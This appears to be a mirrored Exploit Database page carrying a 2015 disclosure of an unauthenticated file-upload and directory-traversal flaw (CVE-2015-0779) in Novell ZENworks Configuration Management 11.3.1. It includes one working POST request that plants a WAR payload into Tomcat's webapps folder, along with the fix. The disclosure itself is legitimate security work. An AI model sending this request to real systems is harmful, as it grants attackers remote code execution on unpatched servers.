Novell ZENworks Configuration Management 11.3.1 – Remote Code Execution

• Exploit Database
• 20 阅读

• 作者： Pedro Ribeiro
  日期： 2015-04-08
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/36678/

• >> Remote code execution in Novell ZENworks Configuration Management 11.3.1
  >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
  =================================================================================
  Disclosure: 07/04/2015 / Last updated: 07/04/2015
  
  >> Background on the affected product:
  "Automate and accelerate your Windows 7 migration
  Microsoft estimates that it can take more than 20 hours to migrate a
  single machine to Windows 7. Novell ZENworks Configuration Management
  is ready to dramatically accelerate and automate every aspect of your
  Windows 7 migration efforts.
  
  Boost user productivity
  Use Novell ZENworks Configuration Management to make sure users always
  have access to the resources they need regardless of where they work
  or what devices they use.
  
  Eliminate IT effort
  Automatically enforce policies and dynamically manage resources with
  identity-based management of users as well as devices.
  
  Expand your freedom to choose
  Manage the lifecycles of all your current and future assets, with full
  support for Windows and Linux systems, Novell eDirectory, Active
  Directory, and more.
  
  Simplify deployment with virtual appliances
  Slash deployment times with a convenient virtual appliance deployment option.
  
  Enjoy a truly unified solution
  Centralize the management of all your devices into a single, unified
  and easy-to-use web-based ZENworks console—called ZENworks Control
  Center."
  
  This vulnerability is present in ZENworks Configuration Management
  (ZCM) which is part of the ZENworks Suite.
  A blast from the past? This is a similar vulnerability to ZDI-10-078 /
  OSVDB-63412, but it abuses a different parameter of the same servlet.
  However this time Novell:
  - Did not bother issuing a security advisory to their customers.
  - Did not credit me even though I did responsible disclosure.
  - Refused to provide a CVE number for months.
  - Did not update their ZENworks Suite Trial software with the fix (you
  can download it now from their site, install and test the PoC /
  Metasploit module).
  - Does not list the fix in the ZCM 11.3.2 update information
  (https://www.novell.com/support/kb/doc.php?id=7015776).
  
  
  >> Technical details:
  Vulnerability: Remote code execution via file upload and directory traversal
  CVE-2015-0779
  Constraints: none; no authentication or any other information needed
  Affected versions: ZENworks Configuration Management 11.3.1 and below
  
  POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war
  <WAR file payload in the body>
  
  The WAR file will be automatically deployed to the server (on certain
  Windows and Linux installations the path can be "../webapps/"). A
  Metasploit module that exploits this vulnerability has been released.
  
  
  >> Fix:
  Upgrade to version ZENworks Configuration Management 11.3.2.
  
  
  [1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt
  [2]: https://github.com/rapid7/metasploit-framework/pull/5096